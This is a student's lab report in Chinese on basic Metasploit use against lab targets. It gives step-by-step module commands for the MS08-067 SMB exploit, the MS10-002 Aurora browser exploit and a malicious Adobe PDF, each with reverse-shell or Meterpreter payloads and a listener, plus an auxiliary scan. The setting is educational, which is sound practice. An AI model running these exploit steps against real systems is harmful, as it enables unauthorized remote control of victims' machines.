20155304《网络对抗》MSF基础应用
实践内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067;
1.2 一个针对浏览器的攻击,如ms11_050;
1.3 一个针对客户端的攻击,如Adobe;
1.4 成功应用任何一个辅助模块。
1.1主动攻击:ms08_067
使用靶机1和Kali
先msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
用use exploit/windows/smb/ms08_067_netapi使用该模块
用show targets查看可以被攻击的靶机的操作系统型号:
用show payloads查看可以供我们使用的攻击载荷:
从中找到一个可用的攻击载荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp设置payload:
用show options查看需要设置的参数:
这里需要设置RHOST(靶机IP)和LHOST(Kali的IP)
设置target选项目标
用show options确认需要设置的参数是否已经设置好:
用exploit指令开始攻击
攻击成功后会获取靶机的shell,可以对其进行操作:
1.2针对浏览器的攻击:MS10_002_aurora漏洞攻击
msf > use windows/browser/ms10_002_aurora调用出该模块,然后设置tcp反弹连接
查看需要修改的参数
SRVHOST和LHOST的ip为攻击机的ip。设置好参数后,exploit
攻击成功,输入sessions -i -1,查看XP桌面信息
还有靶机的ip信息等
1.3针对客户端的攻击:adobe_toolbutton
用search adobe查询一下针对该漏洞的攻击模块:
选择一个模块使用
用show targets查看可以被攻击的靶机的操作系统型号:
,使用命令set payload windows/meterpreter/reverse_tcp设置payload攻击载荷
用show options查看需要设置的参数:
设置相应参数,实施exploit攻击,在/root/.msf4/local/目录下成功生成了一.pdf文件
将pdf文件粘贴到靶机win xp
在kali中和前几次实验一样打开并设置监听模块use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,再设置IP以及端口
在靶机上打开刚刚那个pdf文件,可以观察到Kali成功获取了靶机的shell,可以对其进行操作:
1.4 成功应用任何一个辅助模块:
查看都有什么辅助模块:
我选择了这个
info查看、设置好要设置的参数
可以查看系统信息了:
基础问题回答
(1)用自己的话解释什么是exploit,payload,encode.
exploit:是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。
payload:就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。
encode:是间谍穿的伪装的衣服,便于间谍潜入目标针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。
实验总结和收获
通过这次实验,我了解到了msf平台的厉害,不仅可以利用多种辅助模块获取靶机信息,还能够查看大部分存在的漏洞并利用这些漏洞实现不同攻击,这里面,更是可以直接实现主动攻击,只要系统存在这个漏洞,就会被直接攻破,看来,实时更新系统是很有必要的